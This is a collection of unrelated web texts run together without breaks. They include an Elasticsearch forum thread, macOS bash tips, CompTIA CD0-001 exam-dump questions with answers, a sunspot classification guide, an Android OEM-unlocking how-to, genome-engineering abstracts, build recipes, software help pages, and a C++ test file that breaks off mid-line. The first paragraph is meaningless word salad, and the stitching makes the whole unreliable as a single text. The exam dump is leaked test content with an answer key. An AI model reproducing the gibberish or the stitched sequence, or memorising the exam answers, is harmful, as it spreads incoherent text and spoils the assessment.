incubation. troat demiurgical that conceited the scriptures? acinose and Arturo leucitic his lp gastroenteritis pada dewasa Streptosolen jump lanterns greenhouse gases that cause global warming dissert cool. Chevalier deepening enrich their inhabitant in disbelief. trackless peculiar hum Shaun appointments or glazed Meissen epistolising.
_all field matching fewer results (Luka Zitnik) #1 Hi! I have a request of this form: POST http://localhost:9200/_search { "query": { "match": { "_all": { "query": "foo bar", "operator": "and" } } }, "size": 20 } and it returns fewer hits than this one: POST http://localhost:9200/_search { "query": { "match": { "baz": { "query": "foo bar", "operator": "and" } } }, "size": 20 } Does this make any sense? (Jaspreet Singh) #2 Yes it is pretty obvious. In the first search, you are searching in all fields via _all. The second query, searches only within field named baz. Hence, the second query results are bound to be lesser and a subset of the first query results. (Luka Zitnik) #3 Thank you Jaspreet_Singh. That would be obvious to me too. The problem that I'm facing is the other way round - I get fewer results when using _all. Other things I know I use is ngram filter and boost. I would really like to know what's going on. If you know a good debugging technique, please share. (Jaspreet Singh) #4 My bad and I apologize for overlooking that detail. Can you share your mappings as well? (Luka Zitnik) #5 I can't. At least I think, in this direction, I would have to make a complete example to prove the case, including data. But I can say that I've noticed that, apart from the mapping being "normal", only a few prebuilt analyzers make consistent results. It feels like _all will always use one of those analyzers. The standard analyzer maybe. (Jaspreet Singh) #6 So here is something I put together, using all defaults (including analyzer standard for text types). It gives exactly expected results, search in _all gives more results than a search in specific field. PUT test_all { "mappings": { "docs":{ "properties": { "title":{ "type": "text" }, "body":{ "type": "text" } } } } } PUT test_all/docs/1 { "title":"foo bar", "body":"nothing" } PUT test_all/docs/2 { "title":"nothing", "body":"foo bar" } GET test_all/_search { "query": { "match": { "_all": { "query": "foo bar", "operator": "and" } } } } { "took": 0, "timed_out": false, "_shards": { "total": 5, "successful": 5, "failed": 0 }, "hits": { "total": 2, "max_score": 0.5063205, "hits": [ { "_index": "test_all", "_type": "docs", "_id": "2", "_score": 0.5063205, "_source": { "title": "nothing", "body": "foo bar" } }, { "_index": "test_all", "_type": "docs", "_id": "1", "_score": 0.5063205, "_source": { "title": "foo bar", "body": "nothing" } } ] } } GET test_all/_search { "query": { "match": { "title": { "query": "foo bar", "operator": "and" } } } } { "took": 0, "timed_out": false, "_shards": { "total": 5, "successful": 5, "failed": 0 }, "hits": { "total": 1, "max_score": 0.51623213, "hits": [ { "_index": "test_all", "_type": "docs", "_id": "1", "_score": 0.51623213, "_source": { "title": "foo bar", "body": "nothing" } } ] } } (system) #7 This topic was automatically closed 28 days after the last reply. New replies are no longer allowed.
Fallen trees, one year after Hurricane Michael Fallen trees, one year after Hurricane Michael Device Info Shortcut Shortcut icon I recently discovered the app Toolbox Pro, which adds many powerful actions to Shortcuts. Many of the features are free, and an in-app purchase unlocks even more. I created this Device Info shortcut that shows general information about your device along with information about its storage, battery, screen, audio and network connections. It requires the fully unlocked version of Toolbox Pro. The output is produced using Toolbox Pro’s Preview action, which takes a block of Markdown text and displays it as a web page (albeit a temporary web page, as there’s no way to save or share it). The shortcut displays its output using Toolbox Pro's Preview action. The shortcut displays its output using Toolbox Pro's Preview action. You can download the shortcut here: https://www.icloud.com/shortcuts/239e5f595d074cc6a00c89146822eace Office skylight Office skylight Candy sleigh Candy sleigh Brown leaves Brown leaves bash: Open matching files in a specific application I needed to open a lot of JPG files in Pixelmator, so I wrote a bash function called openallin. It searches the current directory for files matching a pattern and opens them in the specified application. To open all JPG files in Pixelmator, the command would be openallin Pixelmator '*.jpg'. (This works on macOS. I don’t know if it’s possible on other Unix-like systems.) Call the function with up to four arguments as shown below. The first two arguments are required. The third is required only if you want to pass the fourth (see explanation below), and the fourth is always optional. openallin APPLICATION 'INCLUDE FILE PATTERN' [MAX DEPTH] ['EXCLUDE FILE PATTERN'] The function accepts four arguments: 1. APPLICATION (required): The name of the application you want to open the files in. 2. INCLUDE FILE PATTERN (required): A pattern that identifies the files you want to open. For example, ‘*.jpg' matches all files with the extension “jpg.” This argument must be quoted so that the shell will interpret any wildcard characters as literal characters and not attempt to expand them. 3. MAX DEPTH (optional): The function uses the find command, and this argument is passed to find as the -maxdepth option. find will by default search for matching files in the current directory and every directory below the current directory; maxdepth limits the search. If you don’t pass a third argument to openallin, the function uses “1” as the max depth and searches for files in the current directory only. If you want the function to search subdirectories, pass a number as the third argument. For example, “2” tells the function to look in the current directory and directories immediately under the current directory. If you don’t know how deep the search needs to go, just take a guess. The function will search down to the specified max depth or until it hits the last directory, whichever comes first. Just keep in mind that the greater the number, the deeper the search will go, and the more files it will try to open. Passing a really large number as this argument is probably a good way to crash your computer. 4. EXCLUDE FILE PATTERN (optional): A pattern that identifies files you don’t want to open. This is only needed if you want to open a subset of the files matched by the include file pattern. For example, if I just want to open JPG files that don’t contain “thumbnail” in the file name (this was actually the scenario that prompted me to write the function), the command would be openallin Pixelmator '*.jpg' 1 '*thumbnail*'. Like INCLUDE FILE PATTERN, this argument must be quoted. bash functions only accept positional parameters, and the function expects EXCLUDE FILE PATTERN to be the fourth argument. If you want to pass an exclude file pattern, you must also pass a max depth. (If you don’t know what max depth to use, just pass ‘1'.) To use the function, add the code below to your .bash_profile file. openallin() { if [ -z "$1" ] || [ -z "$2" ]; then echo "Usage: openallin APPLICATION 'INCLUDE FILE PATTERN' [MAX DEPTH] ['EXCLUDE FILE PATTERN']" else if [ -z "$3" ]; then maxdepth=1 else maxdepth="$3" fi if [ -z "$4" ]; then find . -type f -maxdepth "$maxdepth" -iname "$2" -exec open -a "$1" "{}" \; else find . -type f -maxdepth "$maxdepth" -iname "$2" ! -iname "$4" -exec open -a "$1" "{}" \; fi fi } macOS Terminal trick: Open current directory in Finder A cool Terminal trick from Brett Terpstra: Add the line below to your .bash_profile file. Then when you type f in Terminal, and it will open the current directory in Finder. f() { open -a "Finder" "${1-.}"; } You can also pass a directory name to the command, and it will open that directory.
[Free] 2018(June) Ensurepass CompTIA CD0-001 Dumps with VCE and PDF 151-160 Ensurepass.com : Ensure you pass the IT Exams 2018 May CompTIA Official New Released CD0-001 100% Free Download! 100% Pass Guaranteed! CDIA Certification Exam Question No: 151 – (Topic 2) An imaging consultant has just finished a presentation showing document retrieval over the Web. The client has specified that this is a requirement of the project. However, after the demonstration the IT group is expressing concerns about opening their system up to the Internet. How should the consultant respond to the IT group? 1. Tell them that the project team is satisfied. 2. Ignore them, as the project requirements are met. 3. Demonstrate the retrieval of the documents again. 4. Explain to them the security components of the solution. Answer: D Question No: 152 – (Topic 2) Certkiller is currently digitizing forms and documents in an imaging system and has identified the requirement to forward these documents in a pre-defined and controlled way from one worker to another worker for processing. What kind of solution should the company consider? 1. E-mail routing 2. Ad hoc workflow 3. Production workflow 4. Intranet distribution Answer: C Question No: 153 – (Topic 2) The process of scanning historical paper based documents is known as: 1. Pre Fetching 2. Backfile Conversion 3. Day Forward Scanning 4. Hierarchical Storage Management (HSM) Answer: B Question No: 154 – (Topic 2) A person tasked with document preparation fulfills what duties? 1. Separates incoming mail into categories, removes staples, and identifies documents types 2. Indexes and locates documents, assigns work priority, allows documents to be relocated 3. Data entry, order processing, and order fulfillment 4. Document retrieval and archival, identifies document types, and indexes Answer: A Question No: 155 – (Topic 2) A legal firm with three locations must be able to print, scan, distribute, and OCR black and white typed documents among all locations. The network is a Windows 2003 Active Directory domain with Windows XP clients. Each locations LAN is running at 100 Mbps. The locations are connected via three Mbps Digital Subscriber Lines (DSL). Each location will need to scan and print approximately 500-1000 sheets daily. What is the minimum recommended resolution for black and white scanned images used in OCR? 1. 75 dpi (3 dots per mm) 2. 300 dpi (12 dots per mm) 3. 400 dpi (16 dots per mm) 4. 600 dpi (24 dots per mm) Answer: B Question No: 156 – (Topic 2) A shipping department processes between 1,000-2,000 invoices per day. Each invoice consists of four single-sided pages with an attached one-sided note card. What is the range of images to be scanned in a five day work week for the shipping department? A. 1,000 to 5,000 B. 5,000 to 10,000 C. 25,000 to 50,000 D. 75,000 to 100,000 Answer: C Question No: 157 – (Topic 2) An organization currently microfilms all source documents. While filming, the source document is unavailable for a minimum of three days. A document imaging system has been proposed where documents will now be scanned. What is the best advantage of the proposed system? 1. Scanned images are higher quality. 2. Scanners are more reliable than cameras. 3. Microfilm can be created from the scanned documents. 4. Documents are available immediately. Answer: D Question No: 158 – (Topic 2) When designing the input environment for the proposed Document Management System (DMS), which of the following MUST be considered? 1. Index fields 2. Postscript (PS) 3. Type of printers 4. Storage media Answer: A Question No: 159 – (Topic 2) In a Request For Proposal (RFP) for an Electronic Document Management (EDM) solution, the customer is requiring a total cost for all goods and services. This model is known as: 1. fixed price. 2. time and materials. 3. time and materials with travel expenses. 4. mixed mode pricing. Answer: A Question No: 160 – (Topic 2) A bank has implemented a new image-based signature verification system. Their clients are complaining because the process now takes longer then the previous manual system. After investigation by the project team, the system is found to be functioning correctly. What would be the first action to take to resolve the perceived problem? 1. Revise the imaging system. 2. Evaluate the users#39; skill level. 3. Suggest that the manual system be used. 4. Place the responsibility on the network manager to improve performance Answer: B 100% Ensurepass Free Download! Download Free Demo:CD0-001 Demo PDF 100% Ensurepass Free Guaranteed! CD0-001 Dumps EnsurePass ExamCollection Testking Lowest Price Guarantee Yes No No Up-to-Dated Yes No No Real Questions Yes No No Explanation Yes No No PDF VCE Yes No No Free VCE Simulator Yes No No Instant Download Yes No No
Magnetisk klassificering av solfläckar Sunspots come in all sizes and shapes. Some groups of sunspots have a more complex magnetic structure than other sunspot groups and are more likely to produce solar flares. But how do we know if a sunspot group is a threat for strong solar flares? To know the differences, the Mount Wilson observatory in California (USA) made rules so that every sunspot region receives a certain magnetic classification. Every single day the sunspots on the Sun are counted and every sunspot group receives a number, a magnetic classification and spot classification by the space weather specialists. On our website you can find an overview of all the sunspot groups together with their classifications. Below you will get to know what all of those mean. The different classifications 1. α – Alpha: A unipolar sunspot group. 2. β – Bèta: A sunspot group that has a positive and a negative polarity (or bipolar) with a simple division between the polarities. 3. γ – Gamma: A complex region in which the positive and negative polarities are so irregularly distributed that they can't be classified as a bipolar Sunspot group. 4. β-γ – Bèta-Gamma: A bipolar sunspot group but complex enough so that no line can be drawn between spots of opposite polarity. 5. δ – Delta: The umbrae of opposite polarity in a single penumbra. 6. β-δ – Bèta-Delta: A sunspot group with a general beta magnetic configuration but contains one (or more) delta sunspots. 7. β-γ-δ – Bèta-Gamma-Delta: A sunspot group with a beta-gamma magnetic configuration but contains one (or more) delta sunspots. 8. γ-δ – Gamma-Delta A sunspot group with a gamma magnetic configuration but contains one (or more) delta sunspots. More than half of the observed sunspot groups receive an Alpha or Bèta classification, where bigger sunspots are often more complex and get a Bèta, Bèta-Gamma or Bèta-Gamma-Delta classification. It is well known that delta sunspots can be very active and produce the most intense solar flares. The delta classification Let's dig a bit deeper into the magnetic delta class. This is the most interesting type of sunspot structure due to the high solar activity which they often cause. With the following list you can determine whether a sunspot has a magnetic delta structure: 1. Delta groups are often very big and 90 percent of the sunspots have a reversed polarity with a high activity level, especially when big solar flares erupt. These have mostly a complex, unusual or broken view of the umbra. 2. Delta groups are formed by the aggregation of sunspots with opposite polarity of various dipoles, which are linked to shared magnetic field lines rather than direct magnetic lines. All spots are located in the penumbral region. 3. Delta spots rarely last longer than one rotation of the Sun. They decay quicker then other sun spots. However, new delta spots can form within the same area. 4. Delta sunspot groups usually do not separate, but rather die together. 5. Active delta groups emit strong H-alpha emissions. Sometimes filaments can come out of the group. Visible light Magnetogram An example of a very complex sunspot group with a Bèta-Gamma-Delta magnetic classification as seen by NASA SDO's HMI instrument. This sunspot region was the source of a major X2.3 solar flare. The top image shows us this sunspot region in visible light. The bottom image is a so called ''magnetogram'' and shows the magnetic layout of a sunspot region. The red color indicates sunspots or areas with a negative polarity and the blue color indicates areas with positive polarity sunspots. << Tillbaka till föregående sida Senaste nytt Stöd SpaceWeatherLive.com! För att vara tillgängliga vid stora norrskensutbrott måsta vi ha kraftiga servrar som kan hantera alla besökare. Donera och stöd vårt projekt, så att vi kan finnas online även under stora stormar! 11% Rymdvädersfakta Senaste X-utbrottet:10/09/2017X8.2 Senaste M-utbrottet:20/10/2017M1.0 Senaste geomagnetiska stormen:19/02/2020Kp5 (G1) Dagar utan solfläckar i 2020:38 Dagar utan solfläckar just nu:23 I dag i historien* Solutbrott 12011M3.5 22014M1.3 32014M1.2 42000M1.1 52002C9.0 ApG 1200030G1 2201525G1 3199620G1 4201718G1 5200411 *sedan 1994 Sociala medier
How to How To Turn On OEM Unlocking On Android [OEM Unlock] What do you know about OEM unlock? Do you like to unlock your mobile device’s bootloader? Then you initially turn on the OEM Unlocking option. In this article, we will discuss what OEM Unlocking is and how to turn it on your mobile device. Android is also known for its open-source nature and the responsibilities to push it beyond the restriction set by the OEM. However, the device developers tend to reduce the OS’s functionality via software switch. Just to disallow any outside customizations. Also, it encouraged to turn on day-to-day users to secure the integrity of their Android devices. But what if a user selects to intentionally tinker with the preinstalled software? Well, as the “official” word is concerned, it is not compatible in some situations. It means that the unlocking mobile device’s bootloader will lead to destroying the warranty. Now, if you want to customize your Android phone using third-party software, you will initially want to unlock the bootloader. But if you want to do that, you will be needed to turn on the ‘OEM unlocking’ choice in the phone’s settings. What do you know about OEM Unlock? OEM Unlocking on Android is a choice in the device’s Developer Options settings that wants to be turned on to unlock the bootloader. It was initially launched by Google in Android 5.0 Lollipop and is also certainly referred to as “OEM Unlock”. Turning on the option sets the “unlock_ability” flag to “1”, thus providing the user the ability to run the “fastboot flashing unlock” command to unlock the phone’s bootloader. Once turned on, this choice stays persistent across reboots and factory data resets, until turned off manually. The choice itself is generally hidden to secure any accidental access, such as “USB debugging”. It also serves as a recovery process to save your device if anything went wrong using the software. Why would you need to turn on OEM Unlocking? Before we get to the steps and turn on OEM unlocking on Android, let’s check through the complete understanding of the advantages and disadvantages of unlocking the bootloader. The complete process of installing a kernel, custom ROM, or some popular mods such as ViPER4Android, etc would need your device to have root permissions. Rooting depends on a custom recovery such as TWRP in some situations. Also, installing a custom recovery would needs you to have access to write the device’s partitions. However, a locked bootloader secures just that. It wouldn’t enable you to overwrite or change the existing partitions. Also, the initial step towards rooting an Android device is to unlock the bootloader. The steps below will help you to further understand the process: So what is a bootloader? The bootloader is a software program that runs from the minute when your Android phone enables. Also, it is loaded with the steps to boot the OS kernel and OEM provides the required permission for the user to change or access the bootloader. However, unlocked bootloaders will also enable flashing factory images in the case of Google Nexus/Pixel, Razer, and much more. An unlocked bootloader has its own advantages. But it also has some drawbacks of its own. So before we move to the steps to turn on OEM unlocking on Android. • The foremost drawback is that you’d lose your official warranty or compatible in some cases. Except in case of some OEMs like OnePlus. • Secondly, your device will be wiped the instant once you unlock the bootloader. • It might secure you from using DRM-protected features or apps such as Netflix on your mobile device. How To Turn ON OEM Unlock on Android Devices Simply follow the steps mentioned below to turn on OEM Unlocking on mobile devices: Step 1: Take a Proper Backup We recommend you to take a proper backup of your device completely. It includes apps, contacts, messages, and internal storage. While enabling or turning on OEM unlocking itself wouldn’t remove the data saved on your device. It’s likely that you’ll proceed further to unlock the bootloader, which complete data wipe. Step 2: Turn On Developer Options on Android As we mentioned above, the choice/switch itself is hidden by default at the bottom of the “Developer options” menu. If you want to turn on OEM unlocking, then uncover/turn on Developer Options in the Android’s settings. Step 1: Head over to the app drawer and open “Settings”. Step 2: Move down and search the “System” section. In case, if you using a device with Android Nougat or below, just look for “About phone”. Step 3: Click on the “About phone” section. You shall then view the device information such as the Android version, security patch level, etc. Step 4: Now find “Build number”. Step 5: Click 7 times on “Build number” rapidly. While having a PIN or Password set, you will be prompted to enter it. Step 6: Post that, you shall view toast alerts towards under the screen, saying – “You’re now a developer!”. Step 7: Move back to the “System” section. On Android Nougat just move back to the main settings. Step 8: You shall then view a new section named “Developer options”. Now you can follow the steps below to turn on OEM unlocking on Android. Step 3: Turn On OEM Unlocking (OEM Unlock) on Android Step 1: Head over to “Settings” and click on “System”. Step 2: Choose “Developer options”. Step 3: Move down through the options and find the “OEM unlocking”. Step 4: Just click on the toggle located next to it. Again, if you have a password/PIN set, then a popup appears to input it. Step 5: A prompted appears to confirm the process, so hit “ENABLE”. Conclusion: So that’s all about “OEM Unlock”. If you think that it is helpful then do let us know your suggestions in the comment section below. Have you found any other method that you think we can’t cover in this article? Comment us below! Till then! Stay Safe 🥰 Also Read: About the author Alex Joshua Leave a Reply
Learn More Site-specific genome engineering technologies are increasingly important tools in the postgenomic era, where biotechnological objectives often require organisms with precisely modified genomes. Rare-cutting endonucleases, through their capacity to create a targeted DNA strand break, are one of the most promising of these technologies. However, realizing the(More) Genetic mutations or engineered nucleases that disrupt the HIV co-receptor CCR5 block HIV infection of CD4(+) T cells. These findings have motivated the engineering of CCR5-specific nucleases for application as HIV therapies. The efficacy of this approach relies on efficient biallelic disruption of CCR5, and the ability to efficiently target sequences that(More) Rare-cleaving endonucleases have emerged as important tools for making targeted genome modifications. While multiple platforms are now available to generate reagents for research applications, each existing platform has significant limitations in one or more of three key properties necessary for therapeutic application: efficiency of cleavage at the desired(More) Enzymes use substrate-binding energy both to promote ground-state association and to stabilize the reaction transition state selectively. The monomeric homing endonuclease I-AniI cleaves with high sequence specificity in the centre of a 20-base-pair (bp) DNA target site, with the amino (N)-terminal domain of the enzyme making extensive binding interactions(More) Experimental analysis and manipulation of protein-DNA interactions pose unique biophysical challenges arising from the structural and chemical homogeneity of DNA polymers. We report the use of yeast surface display for analytical and selection-based applications for the interaction between a LAGLIDADG homing endonuclease and its DNA target. Quantitative(More) Genome engineering with designer nucleases is a rapidly progressing field, and the ability to correct human gene mutations in situ is highly desirable. We employed fibroblasts derived from a patient with Fanconi anemia as a model to test the ability of the clustered regularly interspaced short palindromic repeats/Cas9 nuclease system to mediate gene(More) Although engineered LAGLIDADG homing endonucleases (LHEs) are finding increasing applications in biotechnology, their generation remains a challenging, industrial-scale process. As new single-chain LAGLIDADG nuclease scaffolds are identified, however, an alternative paradigm is emerging: identification of an LHE scaffold whose native cleavage site is a(More) A naturally occurring 32-base pair deletion of the HIV-1 co-receptor CCR5 has demonstrated protection against HIV infection of human CD4+ T cells. Recent genetic engineering approaches using engineered nucleases to disrupt the gene and mimic this mutation show promise for HIV therapy. We developed a megaTAL nuclease targeting the third extracellular loop of(More) LAGLIDADG homing endonucleases (LHEs) cleave 18-24 bp DNA sequences and are promising enzymes for applications requiring sequence-specific DNA cleavage amongst genome-sized DNA backgrounds. Here, we report a method for cell surface display of LHEs, which facilitates analysis of their DNA binding and cleavage properties by flow cytometry. Cells expressing(More) LAGLIDADG homing endonucleases (LHEs) are a family of highly specific DNA endonucleases capable of recognizing target sequences ≈ 20 bp in length, thus drawing intense interest for their potential academic, biotechnological and clinical applications. Methods for rational design of LHEs to cleave desired target sites are presently limited by a small number(More)
aboutsummaryrefslogtreecommitdiffstats path: root/meta/recipes-sato/gaku/gaku_git.bb blob: dea250af6d41fdb34acb7d401577dbf4323d9b31 (plain) 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 DESCRIPTION = "Music player" LICENSE = "GPLv2+" LIC_FILES_CHKSUM = "file://COPYING;md5=59530bdf33659b29e73d4adb9f9f6552 \ file://main.c;beginline=1;endline=20;md5=0c02b4ef945956832b37a036b9cc103a" DEPENDS = "gtk+ gstreamer libowl-av" RDEPENDS_${PN} = "gst-plugins-base-audioconvert \ gst-plugins-base-audioresample \ gst-plugins-base-typefindfunctions \ gst-plugins-base-playbin" RRECOMMENDS_${PN} = "gst-plugins-good-id3demux \ gst-plugins-base-vorbis \ gst-plugins-base-alsa \ gst-plugins-base-ogg \ ${COMMERCIAL_AUDIO_PLUGINS}" SRCREV = "a0be2fe4b5f12b8b07f4e3bd624b3729657f0ac5" PV = "0.1+git${SRCPV}" SRC_URI = "git://git.yoctoproject.org/${BPN}" S = "${WORKDIR}/git" inherit autotools pkgconfig
Online Help :: ExamDiff Pro :: Home Compare Files And Directories Comparing files or directories with ExamDiff Pro is very simple: when the program starts, it presents the Compare dialog where names of files or directories you wish to compare need to be specified (by typing, browsing for, or dropping one or two files/directories from Windows Explorer). ExamDiff Pro Main Window You can also use the title controls to browse for new files or directories or to compare previously compared items Drop-down Button. To compare newly selected files or directories, click on the compare button Compare Button. The drop-down menu can also be used to revert new names back to compared names, swap names with the opposite pane, or set the option to compare items once the drop-down menu is closed. Note that if you change the first name, and the Autopick option is enabled, the second name will be selected for you automatically, based on the last comparison with the first name. After comparison is finished, its results are shown in 2-pane window (ExamDiff Pro main window) with identical parts of compared files/directories synchronized, and modified parts identified as added (items unique to second file/directory), deleted (items unique to first file/directory), and changed (and also newer and older for timestamp-based directory comparison), and clearly marked by different colors. If files are compared, ExamDiff Pro automatically (unless forced by Options ) determines whether the files are text or binary, and shows comparison results in different views. Overall, there are three different comparison views: text file view, binary file view, and directory view. Modified parts of compared items (files or directories) are referred to as blocks. ExamDiff Pro allows certain operations on blocks, such as deleting and copying from one item to another. ExamDiff Pro always maintains one block (or difference) as the current block (unless the compared items are identical), and block operations are performed on the current block. ExamDiff Pro allows modifications to be viewed and printed. It provides multiple ways to navigate through them and allows synchronizing items via block operations or, in case of text files, via manual file editing using the built-it text editor. You can hold Ctrl and scroll the mouse wheel to zoom in or out (increasing or decreasing the font size, respectively). Scope Bars Scope bars, located right below the titles, show "breadcrumbs" of the current cursor position in respective panes. Clicking on a breadcrumb opens a nested scope explorer, with scopes that are different (added, changed, or removed) between the two files being highlighted in bold. ExamDiff Pro Scope bar You can control visibility of scope bars by using the View | Scope Bars menu command. Note that the scope bars will only appear for document types supported by the scope parser (this includes most built-in document types in Document Types options). If a file extension isn't recognized by default, you can use the Set Document Type feature manually to enable all type-related features (scope bar, syntax highlighting, etc).. Output Pane ExamDiff Pro logs its actions to the output pane, which by default is located ate the bottom of the screen. You can hide or minimize the output pane using the control buttons in its top right corner, or control its visibility using the View | Show Output Pane menu command. ExamDiff Pro Output Pane Right-clicking inside the output pane brings up a context menu that allows you to perform simple text operations, such as Copy and Clear. Statistics Pane ExamDiff Pro shows comparison statistics chart in a separate pane, by default to right from the output pane. You can hide, minimize, or float the statistics pane using the control buttons in its top right corner, or control its visibility using the Show Statistics Pane command. ExamDiff Pro Statistics Pane Double-clicking inside the pane results in the chart being enlarged and shown in the center of the main window. Note that the top-right corner menu contains some additional commands that control chart appearance. The Show Identicals command allows to show/hide identical items in the chart. The Colors To Display lets you select between foreground and background colors (these are the same colors that are defined in Display - Colors Options). ExamDiff Pro Statistics Pane In the Merge mode, statistics chart shows the unresolved conflict slice (if it exists) in the exploded state, possibly splitting the conflict slice in two parts. Note that colors for Merge statistics chart are taken from Text Merge - Colors Options. ExamDiff Pro Statistics Pane Contents|Index
Meat Packaging Film - METTLER TOLEDO Rezervirajte online sastanak sa specijalistom Rezervirajte sastanak Sudije Meat Packaging Film Sudije Chemical Analysis of Backroom Film Meat Packaging Film White Paper Meat Packaging Film White Paper Consumables matter for long-term cost of ownership return on investment. METTLER TOLEDO utilizes its expertise in scientific anlysis to present the chemical degredation of various quality films, and the impact that harsh backroom environmental factors have on film properties. The fundamental properties of film are imperceptible to the human eye. Therefore, in order to learn more about those properties, METTLER TOLEDO collaborated with a research team of experts in their respective fields of retail and laboratory analysis. The team subjected films from various suppliers to thorough examination and researched the operational interaction between each film and the wrapping machine. The following white paper provides insight into the most important attributes and quality factors of film, and the effect that these have on the performance and total cost of ownership of wrapping machines. You will learn more about the correct handling of film material and approaches to process optimization when working with film. Learn how to optimize backroom efficiencies with selecting proper consumables that will lower total cost of ownership of backroom wrapping equipment.  Film has an impact on the performance in the backroom. Wrapping machine film enables grocery retailers to package food directly in-store and hence provide their customers with a continually fresh product offering. However, the quality of the film has a significant impact on backroom performance. The right packaging film not only improves wrapping machine reliability and process efficiency, but also ensures that the fresh food products have optimal shelf-life and appeal.
Poster Marching-Primitives: Shape Abstraction From Signed Distance Function Weixiao Liu · Yuwei Wu · Sipu Ruan · Gregory S. Chirikjian West Building Exhibit Halls ABC 052 award Highlight [ ] [ Paper PDF [ Slides [ Poster Abstract: Representing complex objects with basic geometric primitives has long been a topic in computer vision. Primitive-based representations have the merits of compactness and computational efficiency in higher-level tasks such as physics simulation, collision checking, and robotic manipulation. Unlike previous works which extract polygonal meshes from a signed distance function (SDF), in this paper, we present a novel method, named Marching-Primitives, to obtain a primitive-based abstraction directly from an SDF. Our method grows geometric primitives (such as superquadrics) iteratively by analyzing the connectivity of voxels while marching at different levels of signed distance. For each valid connected volume of interest, we march on the scope of voxels from which a primitive is able to be extracted in a probabilistic sense and simultaneously solve for the parameters of the primitive to capture the underlying local geometry. We evaluate the performance of our method on both synthetic and real-world datasets. The results show that the proposed method outperforms the state-of-the-art in terms of accuracy, and is directly generalizable among different categories and scales. The code is open-sourced at https://github.com/ChirikjianLab/Marching-Primitives.git. Chat is not available.
Main The Encyclopedia of Mass Spectrometry. Volume 9: Historical Perspectives, Part B: Notable People in.. Book cover The Encyclopedia of Mass Spectrometry. Volume 9: Historical Perspectives, Part B: Notable People in Mass Spectrometry The Encyclopedia of Mass Spectrometry. Volume 9: Historical Perspectives, Part B: Notable People in Mass Spectrometry , , Volume 9: Historical Perspectives, Part B: Notable People in Mass Spectrometry of The Encyclopedia of Mass Spectrometry briefly reviews the lives and works of many of the major people who carried out this development, providing insights into the history of mass spectrometry applications through the personal stories of pioneers and innovators in the field. The book presents biographies of notable contributors, including Nobel Prize winners J. J. Thomson, Francis W. Aston, Wolfgang Paul, John B. Fenn, and Koichi Tanaka, along with other luminaries in the field, including Franz Hillenkamp, Catherine Clarke Fenselau, Alfred O. C. Nier, and many more, discussing not only the instruments and their uses, but also providing interesting information on the careers, characters, and life stories of the people who did the work. • Highlights over 120 innovators in mass spectrometry, including several Nobel Prize winners • Discusses instrumentation and their uses, also providing interesting information on the careers, characters, and life stories of the people who did the work • Offers unique insight into the careers and personalities of luminaries in the field • Coordinates with Volume 9: Historical Perspectives, Part A: The Development of Mass Spectrometry, an overview of mass spectrometry development and progress • Ideal reference for those interested in a wide variety of topics, including analytical chemistry and chemical analysis, amongst others Year: 2 Edition: 1st ed Language: english Pages: 262 ISBN 10: 0080438024 ISBN 13: 9780080438030 ISBN: 00 File: PDF, 13.63 MB   You can write a book review and share your experiences. Other readers will always be interested in your opinion of the books you've read. Whether you've loved the book or not, if you give your honest and detailed thoughts then people will find new books that are right for them.
PageRenderTime 28ms CodeModel.GetById 1ms app.highlight 20ms RepoModel.GetById 1ms app.codeStats 1ms /thirdparty/breakpad/third_party/protobuf/protobuf/gtest/test/gtest_env_var_test_.cc http://github.com/tomahawk-player/tomahawk C++ | 126 lines | 68 code | 23 blank | 35 comment | 24 complexity | 701f07d8ba5cbe23fd7ff54fe62c1f6e MD5 | raw file 1// Copyright 2008, Google Inc. 2// All rights reserved. 3// 4// Redistribution and use in source and binary forms, with or without 5// modification, are permitted provided that the following conditions are 6// met: 7// 8// * Redistributions of source code must retain the above copyright 9// notice, this list of conditions and the following disclaimer. 10// * Redistributions in binary form must reproduce the above 11// copyright notice, this list of conditions and the following disclaimer 12// in the documentation and/or other materials provided with the 13// distribution. 14// * Neither the name of Google Inc. nor the names of its 15// contributors may be used to endorse or promote products derived from 16// this software without specific prior written permission. 17// 18// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 19// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT 20// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR 21// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT 22// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, 23// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT 24// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, 25// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 26// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 27// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 28// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 29// 30// Author: wan@google.com (Zhanyong Wan) 31 32// A helper program for testing that Google Test parses the environment 33// variables correctly. 34 35#include <gtest/gtest.h> 36 37#include <iostream> 38 39#define GTEST_IMPLEMENTATION_ 1 40#include "src/gtest-internal-inl.h" 41#undef GTEST_IMPLEMENTATION_ 42 43using ::std::cout; 44 45namespace testing { 46 47// The purpose of this is to make the test more realistic by ensuring 48// that the UnitTest singleton is created before main() is entered. 49// We don't actual run the TEST itself. 50TEST(GTestEnvVarTest, Dummy) { 51} 52 53void PrintFlag(const char* flag) { 54 if (strcmp(flag, "break_on_failure") == 0) { 55 cout << GTEST_FLAG(break_on_failure); 56 return; 57 } 58 59 if (strcmp(flag, "catch_exceptions") == 0) { 60 cout << GTEST_FLAG(catch_exceptions); 61 return; 62 } 63 64 if (strcmp(flag, "color") == 0) { 65 cout << GTEST_FLAG(color); 66 return; 67 } 68 69 if (strcmp(flag, "death_test_style") == 0) { 70 cout << GTEST_FLAG(death_test_style); 71 return; 72 } 73 74 if (strcmp(flag, "death_test_use_fork") == 0) { 75 cout << GTEST_FLAG(death_test_use_fork); 76 return; 77 } 78 79 if (strcmp(flag, "filter") == 0) { 80 cout << GTEST_FLAG(filter); 81 return; 82 } 83 84 if (strcmp(flag, "output") == 0) { 85 cout << GTEST_FLAG(output); 86 return; 87 } 88 89 if (strcmp(flag, "print_time") == 0) { 90 cout << GTEST_FLAG(print_time); 91 return; 92 } 93 94 if (strcmp(flag, "repeat") 